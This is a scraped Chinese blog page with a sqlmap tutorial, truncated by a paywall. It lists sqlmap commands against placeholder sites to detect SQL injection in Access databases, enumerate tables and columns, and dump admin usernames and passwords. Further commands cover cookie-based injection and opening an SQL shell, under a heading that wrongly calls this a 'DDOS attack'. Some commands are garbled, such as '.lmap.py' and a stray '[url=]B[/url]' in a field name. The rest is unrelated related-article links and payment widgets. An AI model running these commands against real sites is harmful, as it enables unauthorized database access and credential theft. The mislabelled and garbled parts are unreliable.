SQLMAP使用方法详解

最新推荐文章于 2023-02-24 14:06:08 发布
最新推荐文章于 2023-02-24 14:06:08 发布
阅读量439 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41757280/article/details/88396806
版权

一共有11种常见SQLmap使用方法:


一、SQLMAP用于Access数据库注入

(1) 猜解是否能注入

1

2

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"

Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"



(2) 猜解表

 

1

2

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables

Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables



(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)

 

1

2

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin

Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin



(4) 根据字段猜解内容(假如通过3得到字段为username和password)

 

1

2

3

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"

Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C

"username,[url=]B[/url]password"





二、SQLMAP用于Cookie注入

(1) cookie注入,猜解表

 

1

win : python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2




(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

 

1

2

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T

admin --level 2




(3) 猜解内容

 

1

2

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T

admin -C "username,password" --level 2






三、SQLMAP用于mysql中DDOS攻击(1) 获取一个Shell

 

1

2

3

4

win:

python sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell

Linux:

sqlmap </
最低0.47元/天 解锁文章
我是超级无敌大废物
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1610
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
xxx@xxx.com
09-09
lorem ipsm dolor sit amet
xxx.com和www.xxx.com的区别
热门推荐
weixin_42613703的博客
12-22 69万+
XXX.com 是主域名! WWW.xxx.com 一般是域名的主页! 在很多情况下,会配置成一样!!! 也有可能,主域名不配置到具体的IP,可能无法解析。。 C:\Windows\system32&gt;nslookup baidu.com 服务器: UnKnown Address: 61.128.114.133 非权威应答: 名称: baidu.com Addresses: 22...
site:xxx.com和site:www.xxx.com的区别
python二级题库
03-21 6万+
 site:xxx.com和site:www.xxx.com的区别很多seo界的朋友都有这个疑问,就是在site:xxx.com和site:www.xxx.com的时候的结果不同,有的时候可能数量会差出很多。      这个问题如果仔细看过google的网站管理员的介绍的话会有所了解的,但是并不是非常的明显,而是用了另外一种表达方式:网站域名xxx.com和www.xxx.com这两种
java.lang.IllegalStateException: No instances available for localhost
chenglc1612的博客
11-30 2662
java.lang.IllegalStateException: No instances available for localhost 在SpringCloud的项目中,我们使用了自动配置的OAuth2RestTemplate,RestTemplate,但是在使用这些restTemplate的时候,url必须是服务的名称,如果要调用真实的域名或...
wwwxxx域名选择(www.xxx.com或者.cn)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-26 51万+
域名就是网站的网址,就跟家庭住址一样,那么域名就是我们网站的地址,我们使用方便记忆的域名(字母/数字+.COM等域名后缀:www.xxx.com)。 按所属机构分常见后缀形式: COM:商业性的机构/公司/个人,因为COM这个后缀公信度高,所以用得比较多 ORG :非盈利的组织、团体 GOV:政府部门 NET:从事Internet相关的的机构或公司 EDU:教育机构 .互联网通用顶级域之一,主要供教育机构,如大学等院校使用,实际使用的教育机构大部分位于美国。 注意:还有很多,但是不常见,就先不
SQLmap使用指令详解
06-12
SQLmap是一款网络安全检测工具 支持现在几乎所有的数据库,比国内的任何工具都强。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化...
SQLMAP2018版本中文详解
05-13
sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新
ibatis sqlmap配置详解
01-09
SqlMap的配置是iBatis中应用的核心。这部分任务占据了iBatis开发的...Sql Map配置文件是iBatis配置的核心,从数据库连接到执行SQL时使用sqlMap文件都是通过此文件中的配置提供给框架的,它通常命名为sqlMapConfig.xml
XXX.rar_H XXX_XXX.www._https://cn.txxx.com_wwwxxxex_xxxwww.98
09-23
信号处理入门级程序,包含了数据采集,频谱分析等
Windows下Sqlmap环境安装教程详解
09-16
主要介绍了Windows下Sqlmap环境安装,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
SQLMAP的注入使用
05-13
SQLMAP的注入使用 SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下...
【建站系列教程】6、.htaccess文件的url重写规则-网页伪静态化
十一月廿七风雨大作
03-03 2万+
【建站系列教程】6、.htaccess文件的url重写规则-网页伪静态化如何创建.htaccess文件?.htaccess是什么htaccess语法教程 写在前面:大家好,我是热爱编程的小泽。 【建站系列教程】是我的亲身建站经历写给广大建站同胞们的教学博客。 喜欢的话点个赞吧~ 评论区欢迎交流讨论~ 注意:.htaccess文件,无文件名,第一个字符就是 . 如何创建.htaccess文件? ...
thinkphp 项目,本地项目用www.XXX(自己填的名称).com访问方式
weixin_42231483的博客
08-03 8万+
本地项目用www.XXX(自己填的名称).com访问方式 第一步 : 先进入 C:\Windows\System32\drivers\etc\hosts 打开hosts文件,在最后一行添加 127.0.0.1 localhost www.xxx1.com www.xxx2.com www.xxx3.com … 等等 www.xxx1.com 就是自...
nginx: [emerg] host not found in upstream “xxx.xxx.com“ /www/server/nginx/conf/nginx.conf test faile
mmiaoChong的博客
02-24 3409
在宝塔里面配置nginx。出现host not found in upstream xxxx.com错误
nginx对于XXX.com和XXX.com/index给映射到www.xxx.com的方式
fhb19870610的专栏
05-15 32万+
location / {             root    C:/website;             index   index.html index.htm index.php;             include C:/website/.htaccess; if ($host !~ "www.xincanzs.com") { rewrite
Nginx自动跳转到带www域名规则配置、Nginx多域名向主域名跳转
phubing
07-05 1万+
nginx 域名跳转 Nginx跳转自动到www域名规则配置,如果设置使 xxx.com域名在用户访问的时候自动跳转到 www.xxx.com呢? step 1 在你的域名管理里面定义 xxx.com和 www.xxx.com 指向你的主机ip地址,可以使用 nslookup 命令测试 直接输入 nslookup xxx.com 和 nslookup www.xxx.com 都有...
操作系统期末复习笔记!
最新发布
06-13
操作系统期末复习笔记
sqlmap 使用icmp
08-19
- *1* *2* *3* [sqlmap使用详解](https://blog.csdn.net/nex1less/article/details/103627718)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值